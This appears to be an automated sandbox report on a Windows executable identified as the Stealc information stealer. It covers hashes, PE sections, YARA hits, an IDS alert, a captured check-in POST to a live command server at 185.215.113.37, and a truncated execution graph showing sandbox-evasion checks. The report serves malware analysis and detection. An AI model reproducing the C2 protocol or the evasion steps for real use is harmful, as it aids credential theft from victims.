                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 18
                • Number of non-executed functions: 89
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe
                • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                185.215.113.37file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                s-part-0017.t-0009.fb-t-msedge.nethttps://verfiy-blue-badge-sign-up.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                • 13.107.253.45
                https://shaw-104167.square.site/Get hashmaliciousHTMLPhisherBrowse
                • 13.107.253.45
                https://attmailmanagementupdates2024.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                • 13.107.253.45
                https://business.helpcaseappealcenter.eu/community-standard/346299132520232Get hashmaliciousUnknownBrowse
                • 13.107.253.45
                http://bervokter-pdf.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                • 13.107.253.45
                https://shawcawebmailserver.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                • 13.107.253.45
                https://shaw-104167.square.site/Get hashmaliciousHTMLPhisherBrowse
                • 13.107.253.45
                https://businesssupport248.mfb72024.click/Get hashmaliciousUnknownBrowse
                • 13.107.253.45
                https://tzr7wtjq.r.us-east-1.awstrack.me/L0/https:%2F%2Fclickproxy.retailrocket.net%2F%3Furl=https%253A%252F%252Fneamunit.ro%2F%2Fwinners%2F%2Fnatalie.gilbert%2FbmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001927b41f2f4-541067bc-8926-4dcb-8f02-24fcf186dd1a-000000/pqvbHhvZKuWAqkc2J1BWoU1pciA=395Get hashmaliciousHTMLPhisherBrowse
                • 13.107.253.45
                kamilia.kaszowski-401(k) Statement-emailCapstonelogistics.emlGet hashmaliciousHTMLPhisherBrowse
                • 13.107.253.45

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.94879283190591
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'829'888 bytes
                MD5:0346a5b7e84da53552826eb2061eb3de
                SHA1:5a69a7e1fa61bb7f83f46e00616b2f2465891550
                SHA256:077cfebf17a05de67e6bd32828a6710312b4ac28c1475ae4cc3346b8607d254a
                SHA512:afa5a2700299ab217d290bc2be922f4bbc3032f0293f6eea672a729fe98707c1f81116ebf1996c834d2330e2e4276463697d7d39b92be243869d25773df45129
                SSDEEP:24576:4CeoLQC8OdMn/rqZwwt7FsqXSJsLUENSg13UCm6iVBYu8QoW8O9wnnBE8u5u:4CeHc8ISPsLFNn3tm6Kbf9CB8
                TLSH:C18533839C3E8E4CC4444F7B25F39FC5F561E4984AEF5F223910B42B9D8AD6B42E416A
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                File Icon

                Icon Hash:00928e8e8686b000

                Static PE Info

                General

                Entrypoint:0xa94000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b

                Entrypoint Preview

                Instruction
                jmp 00007F0B089D0A5Ah
                bswap edx
                sbb eax, dword ptr [eax]
                add byte ptr [eax], al
                add byte ptr [eax], al
                jmp 00007F0B089D2A55h
                add byte ptr [eax+eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                and al, 00h
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add dword ptr [eax+00000000h], eax
                add byte ptr [eax], al
                adc byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add al, byte ptr [ecx]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al

                Rich Headers

                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                0x10000x25b0000x22800a36f9294226645a5240834ff2ca8fd3dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                0x25e0000x29c0000x200654d826e42021f960871ef8bef5ed8ceunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                xxaxmlaz0x4fa0000x1990000x198a0006550a8ce26b7be54ecff06169020996False0.9948426506576935data7.954308030352957IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                mnkxawcp0x6930000x10000x400f32a5a6a14a8720986875b4344d6e8c8False0.7705078125data6.0839613661045515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant0x6940000x30000x22008dacdcac4538e09814d5a75858ab0580False0.06571691176470588DOS executable (COM)0.7695111558506653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                Imports

                DLLImport
                kernel32.dlllstrcpy

                Network Behavior

                Suricata IDS Alerts

                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-10-14T06:53:06.649678+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Oct 14, 2024 06:53:05.623189926 CEST4970480192.168.2.5185.215.113.37
                Oct 14, 2024 06:53:05.628061056 CEST8049704185.215.113.37192.168.2.5
                Oct 14, 2024 06:53:05.628159046 CEST4970480192.168.2.5185.215.113.37
                Oct 14, 2024 06:53:05.628458023 CEST4970480192.168.2.5185.215.113.37
                Oct 14, 2024 06:53:05.633218050 CEST8049704185.215.113.37192.168.2.5
                Oct 14, 2024 06:53:06.328778028 CEST8049704185.215.113.37192.168.2.5
                Oct 14, 2024 06:53:06.329159975 CEST4970480192.168.2.5185.215.113.37
                Oct 14, 2024 06:53:06.421540976 CEST4970480192.168.2.5185.215.113.37
                Oct 14, 2024 06:53:06.426470995 CEST8049704185.215.113.37192.168.2.5
                Oct 14, 2024 06:53:06.649586916 CEST8049704185.215.113.37192.168.2.5
                Oct 14, 2024 06:53:06.649677992 CEST4970480192.168.2.5185.215.113.37
                Oct 14, 2024 06:53:09.882179976 CEST4970480192.168.2.5185.215.113.37

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Oct 14, 2024 06:53:14.622353077 CEST1.1.1.1192.168.2.50x1a14No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                Oct 14, 2024 06:53:14.622353077 CEST1.1.1.1192.168.2.50x1a14No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                Oct 14, 2024 06:53:14.622353077 CEST1.1.1.1192.168.2.50x1a14No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • 185.215.113.37

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.549704185.215.113.37805004C:\Users\user\Desktop\file.exe
                TimestampBytes transferredDirectionData
                Oct 14, 2024 06:53:05.628458023 CEST89OUTGET / HTTP/1.1
                Host: 185.215.113.37
                Connection: Keep-Alive
                Cache-Control: no-cache
                Oct 14, 2024 06:53:06.328778028 CEST203INHTTP/1.1 200 OK
                Date: Mon, 14 Oct 2024 04:53:06 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 0
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Oct 14, 2024 06:53:06.421540976 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFI
                Host: 185.215.113.37
                Content-Length: 211
                Connection: Keep-Alive
                Cache-Control: no-cache
                Data Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 43 32 44 30 46 34 45 31 32 42 32 32 32 35 30 36 35 39 38 37 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 2d 2d 0d 0a
                Data Ascii: ------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="hwid"82C2D0F4E12B2225065987------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="build"doma------DGDBKFBAKFBFHIECFBFI--
                Oct 14, 2024 06:53:06.649586916 CEST210INHTTP/1.1 200 OK
                Date: Mon, 14 Oct 2024 04:53:06 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Content-Length: 8
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: text/html; charset=UTF-8
                Data Raw: 59 6d 78 76 59 32 73 3d
                Data Ascii: YmxvY2s=


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                System Behavior

                General

                Target ID:0
                Start time:00:53:00
                Start date:14/10/2024
                Path:C:\Users\user\Desktop\file.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\file.exe"
                Imagebase:0x620000
                File size:1'829'888 bytes
                MD5 hash:0346A5B7E84DA53552826EB2061EB3DE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2105418364.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2147145348.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:7.1%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:2.9%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:25
                  execution_graph 13529 6369f0 13574 622260 13529->13574 13553 636a64 13554 63a9b0 4 API calls 13553->13554 13555 636a6b 13554->13555 13556 63a9b0 4 API calls 13555->13556 13557 636a72 13556->13557 13558 63a9b0 4 API calls 13557->13558 13559 636a79 13558->13559 13560 63a9b0 4 API calls 13559->13560 13561 636a80 13560->13561 13726 63a8a0 13561->13726 13563 636b0c 13730 636920 GetSystemTime 13563->13730 13564 636a89 13564->13563 13566 636ac2 OpenEventA 13564->13566 13568 636af5 CloseHandle Sleep 13566->13568 13569 636ad9 13566->13569 13571 636b0a 13568->13571 13573 636ae1 CreateEventA 13569->13573 13571->13564 13573->13563 13927 6245c0 13574->13927 13576 622274 13577 6245c0 2 API calls 13576->13577 13578 62228d 13577->13578 13579 6245c0 2 API calls 13578->13579 13580 6222a6 13579->13580 13581 6245c0 2 API calls 13580->13581 13582 6222bf 13581->13582 13583 6245c0 2 API calls 13582->13583 13584 6222d8 13583->13584 13585 6245c0 2 API calls 13584->13585 13586 6222f1 13585->13586 13587 6245c0 2 API calls 13586->13587 13588 62230a 13587->13588 13589 6245c0 2 API calls 13588->13589 13590 622323 13589->13590 13591 6245c0 2 API calls 13590->13591 13592 62233c 13591->13592 13593 6245c0 2 API calls 13592->13593 13594 622355 13593->13594 13595 6245c0 2 API calls 13594->13595 13596 62236e 13595->13596 13597 6245c0 2 API calls 13596->13597 13598 622387 13597->13598 13599 6245c0 2 API calls 13598->13599 13600 6223a0 13599->13600 13601 6245c0 2 API calls 13600->13601 13602 6223b9 13601->13602 13603 6245c0 2 API calls 13602->13603 13604 6223d2 13603->13604 13605 6245c0 2 API calls 13604->13605 13606 6223eb 13605->13606 13607 6245c0 2 API calls 13606->13607 13608 622404 13607->13608 13609 6245c0 2 API calls 13608->13609 13610 62241d 13609->13610 13611 6245c0 2 API calls 13610->13611 13612 622436 13611->13612 13613 6245c0 2 API calls 13612->13613 13614 62244f 13613->13614 13615 6245c0 2 API calls 13614->13615 13616 622468 13615->13616 13617 6245c0 2 API calls 13616->13617 13618 622481 13617->13618 13619 6245c0 2 API calls 13618->13619 13620 62249a 13619->13620 13621 6245c0 2 API calls 13620->13621 13622 6224b3 13621->13622 13623 6245c0 2 API calls 13622->13623 13624 6224cc 13623->13624 13625 6245c0 2 API calls 13624->13625 13626 6224e5 13625->13626 13627 6245c0 2 API calls 13626->13627 13628 6224fe 13627->13628 13629 6245c0 2 API calls 13628->13629 13630 622517 13629->13630 13631 6245c0 2 API calls 13630->13631 13632 622530 13631->13632 13633 6245c0 2 API calls 13632->13633 13634 622549 13633->13634 13635 6245c0 2 API calls 13634->13635 13636 622562 13635->13636 13637 6245c0 2 API calls 13636->13637 13638 62257b 13637->13638 13639 6245c0 2 API calls 13638->13639 13640 622594 13639->13640 13641 6245c0 2 API calls 13640->13641 13642 6225ad 13641->13642 13643 6245c0 2 API calls 13642->13643 13644 6225c6 13643->13644 13645 6245c0 2 API calls 13644->13645 13646 6225df 13645->13646 13647 6245c0 2 API calls 13646->13647 13648 6225f8 13647->13648 13649 6245c0 2 API calls 13648->13649 13650 622611 13649->13650 13651 6245c0 2 API calls 13650->13651 13652 62262a 13651->13652 13653 6245c0 2 API calls 13652->13653 13654 622643 13653->13654 13655 6245c0 2 API calls 13654->13655 13656 62265c 13655->13656 13657 6245c0 2 API calls 13656->13657 13658 622675 13657->13658 13659 6245c0 2 API calls 13658->13659 13660 62268e 13659->13660 13661 639860 13660->13661 13932 639750 GetPEB 13661->13932 13663 639868 13664 639a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13663->13664 13665 63987a 13663->13665 13666 639af4 GetProcAddress 13664->13666 13667 639b0d 13664->13667 13670 63988c 21 API calls 13665->13670 13666->13667 13668 639b46 13667->13668 13669 639b16 GetProcAddress GetProcAddress 13667->13669 13671 639b68 13668->13671 13672 639b4f GetProcAddress 13668->13672 13669->13668 13670->13664 13673 639b71 GetProcAddress 13671->13673 13674 639b89 13671->13674 13672->13671 13673->13674 13675 639b92 GetProcAddress GetProcAddress 13674->13675 13676 636a00 13674->13676 13675->13676 13677 63a740 13676->13677 13678 63a750 13677->13678 13679 636a0d 13678->13679 13680 63a77e lstrcpy 13678->13680 13681 6211d0 13679->13681 13680->13679 13682 6211e8 13681->13682 13683 621217 13682->13683 13684 62120f ExitProcess 13682->13684 13685 621160 GetSystemInfo 13683->13685 13686 621184 13685->13686 13687 62117c ExitProcess 13685->13687 13688 621110 GetCurrentProcess VirtualAllocExNuma 13686->13688 13689 621141 ExitProcess 13688->13689 13690 621149 13688->13690 13933 6210a0 VirtualAlloc 13690->13933 13693 621220 13937 6389b0 13693->13937 13696 621249 __aulldiv 13697 62129a 13696->13697 13698 621292 ExitProcess 13696->13698 13699 636770 GetUserDefaultLangID 13697->13699 13700 6367d3 13699->13700 13701 636792 13699->13701 13707 621190 13700->13707 13701->13700 13702 6367a3 ExitProcess 13701->13702 13703 6367c1 ExitProcess 13701->13703 13704 6367b7 ExitProcess 13701->13704 13705 6367cb ExitProcess 13701->13705 13706 6367ad ExitProcess 13701->13706 13708 6378e0 3 API calls 13707->13708 13709 62119e 13708->13709 13710 6211cc 13709->13710 13711 637850 3 API calls 13709->13711 13714 637850 GetProcessHeap RtlAllocateHeap GetUserNameA 13710->13714 13712 6211b7 13711->13712 13712->13710 13713 6211c4 ExitProcess 13712->13713 13715 636a30 13714->13715 13716 6378e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13715->13716 13717 636a43 13716->13717 13718 63a9b0 13717->13718 13939 63a710 13718->13939 13720 63a9c1 lstrlen 13722 63a9e0 13720->13722 13721 63aa18 13940 63a7a0 13721->13940 13722->13721 13724 63a9fa lstrcpy lstrcat 13722->13724 13724->13721 13725 63aa24 13725->13553 13727 63a8bb 13726->13727 13728 63a90b 13727->13728 13729 63a8f9 lstrcpy 13727->13729 13728->13564 13729->13728 13944 636820 13730->13944 13732 63698e 13733 636998 sscanf 13732->13733 13973 63a800 13733->13973 13735 6369aa SystemTimeToFileTime SystemTimeToFileTime 13736 6369e0 13735->13736 13737 6369ce 13735->13737 13739 635b10 13736->13739 13737->13736 13738 6369d8 ExitProcess 13737->13738 13740 635b1d 13739->13740 13741 63a740 lstrcpy 13740->13741 13742 635b2e 13741->13742 13975 63a820 lstrlen 13742->13975 13745 63a820 2 API calls 13746 635b64 13745->13746 13747 63a820 2 API calls 13746->13747 13748 635b74 13747->13748 13979 636430 13748->13979 13751 63a820 2 API calls 13752 635b93 13751->13752 13753 63a820 2 API calls 13752->13753 13754 635ba0 13753->13754 13755 63a820 2 API calls 13754->13755 13756 635bad 13755->13756 13757 63a820 2 API calls 13756->13757 13758 635bf9 13757->13758 13988 6226a0 13758->13988 13766 635cc3 13767 636430 lstrcpy 13766->13767 13768 635cd5 13767->13768 13769 63a7a0 lstrcpy 13768->13769 13770 635cf2 13769->13770 13771 63a9b0 4 API calls 13770->13771 13772 635d0a 13771->13772 13773 63a8a0 lstrcpy 13772->13773 13774 635d16 13773->13774 13775 63a9b0 4 API calls 13774->13775 13776 635d3a 13775->13776 13777 63a8a0 lstrcpy 13776->13777 13778 635d46 13777->13778 13779 63a9b0 4 API calls 13778->13779 13780 635d6a 13779->13780 13781 63a8a0 lstrcpy 13780->13781 13782 635d76 13781->13782 13783 63a740 lstrcpy 13782->13783 13784 635d9e 13783->13784 14714 637500 GetWindowsDirectoryA 13784->14714 13787 63a7a0 lstrcpy 13788 635db8 13787->13788 14724 624880 13788->14724 13790 635dbe 14870 6317a0 13790->14870 13792 635dc6 13793 63a740 lstrcpy 13792->13793 13794 635de9 13793->13794 13795 621590 lstrcpy 13794->13795 13796 635dfd 13795->13796 14886 625960 13796->14886 13798 635e03 15030 631050 13798->15030 13800 635e0e 13801 63a740 lstrcpy 13800->13801 13802 635e32 13801->13802 13803 621590 lstrcpy 13802->13803 13804 635e46 13803->13804 13805 625960 34 API calls 13804->13805 13806 635e4c 13805->13806 15034 630d90 13806->15034 13808 635e57 13809 63a740 lstrcpy 13808->13809 13810 635e79 13809->13810 13811 621590 lstrcpy 13810->13811 13812 635e8d 13811->13812 13813 625960 34 API calls 13812->13813 13814 635e93 13813->13814 15041 630f40 13814->15041 13816 635e9e 13817 621590 lstrcpy 13816->13817 13818 635eb5 13817->13818 15046 631a10 13818->15046 13820 635eba 13821 63a740 lstrcpy 13820->13821 13822 635ed6 13821->13822 15390 624fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13822->15390 13824 635edb 13825 621590 lstrcpy 13824->13825 13826 635f5b 13825->13826 15397 630740 13826->15397 13828 635f60 13829 63a740 lstrcpy 13828->13829 13830 635f86 13829->13830 13831 621590 lstrcpy 13830->13831 13832 635f9a 13831->13832 13833 625960 34 API calls 13832->13833 13928 6245d1 RtlAllocateHeap 13927->13928 13931 624621 VirtualProtect 13928->13931 13931->13576 13932->13663 13934 6210c2 ctype 13933->13934 13935 6210fd 13934->13935 13936 6210e2 VirtualFree 13934->13936 13935->13693 13936->13935 13938 621233 GlobalMemoryStatusEx 13937->13938 13938->13696 13939->13720 13941 63a7c2 13940->13941 13942 63a7ec 13941->13942 13943 63a7da lstrcpy 13941->13943 13942->13725 13943->13942 13945 63a740 lstrcpy 13944->13945 13946 636833 13945->13946 13947 63a9b0 4 API calls 13946->13947 13948 636845 13947->13948 13949 63a8a0 lstrcpy 13948->13949 13950 63684e 13949->13950 13951 63a9b0 4 API calls 13950->13951 13952 636867 13951->13952 13953 63a8a0 lstrcpy 13952->13953 13954 636870 13953->13954 13955 63a9b0 4 API calls 13954->13955 13956 63688a 13955->13956 13957 63a8a0 lstrcpy 13956->13957 13958 636893 13957->13958 13959 63a9b0 4 API calls 13958->13959 13960 6368ac 13959->13960 13961 63a8a0 lstrcpy 13960->13961 13962 6368b5 13961->13962 13963 63a9b0 4 API calls 13962->13963 13964 6368cf 13963->13964 13965 63a8a0 lstrcpy 13964->13965 13966 6368d8 13965->13966 13967 63a9b0 4 API calls 13966->13967 13968 6368f3 13967->13968 13969 63a8a0 lstrcpy 13968->13969 13970 6368fc 13969->13970 13971 63a7a0 lstrcpy 13970->13971 13972 636910 13971->13972 13972->13732 13974 63a812 13973->13974 13974->13735 13976 63a83f 13975->13976 13977 635b54 13976->13977 13978 63a87b lstrcpy 13976->13978 13977->13745 13978->13977 13980 63a8a0 lstrcpy 13979->13980 13981 636443 13980->13981 13982 63a8a0 lstrcpy 13981->13982 13983 636455 13982->13983 13984 63a8a0 lstrcpy 13983->13984 13985 636467 13984->13985 13986 63a8a0 lstrcpy 13985->13986 13987 635b86 13986->13987 13987->13751 13989 6245c0 2 API calls 13988->13989 13990 6226b4 13989->13990 13991 6245c0 2 API calls 13990->13991 13992 6226d7 13991->13992 13993 6245c0 2 API calls 13992->13993 13994 6226f0 13993->13994 13995 6245c0 2 API calls 13994->13995 13996 622709 13995->13996 13997 6245c0 2 API calls 13996->13997 13998 622736 13997->13998 13999 6245c0 2 API calls 13998->13999 14000 62274f 13999->14000 14001 6245c0 2 API calls 14000->14001 14002 622768 14001->14002 14003 6245c0 2 API calls 14002->14003 14004 622795 14003->14004 14005 6245c0 2 API calls 14004->14005 14006 6227ae 14005->14006 14007 6245c0 2 API calls 14006->14007 14008 6227c7 14007->14008 14009 6245c0 2 API calls 14008->14009 14010 6227e0 14009->14010 14011 6245c0 2 API calls 14010->14011 14012 6227f9 14011->14012 14013 6245c0 2 API calls 14012->14013 14014 622812 14013->14014 14015 6245c0 2 API calls 14014->14015 14016 